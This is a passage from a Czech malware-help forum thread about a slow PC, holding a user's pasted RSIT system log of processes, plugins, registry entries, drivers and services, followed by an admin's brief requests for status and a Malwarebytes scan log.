C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\sppsvc.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Users\Drone\Desktop\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-05 18:40:02 ----D---- C:\_OTM
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 18:50:01 ----D---- C:\Program Files\trend micro
2018-09-05 18:49:02 ----D---- C:\Windows\Temp
2018-09-05 18:43:04 ----SHD---- C:\Windows\Installer
2018-09-05 18:43:04 ----SHD---- C:\Config.Msi
2018-09-05 18:42:36 ----D---- C:\Windows\SysWOW64
2018-09-05 18:42:36 ----D---- C:\Windows
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
OK. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
Změna k lepšímu nenastala.
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Udělejte kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Přispějete na provoz fóra?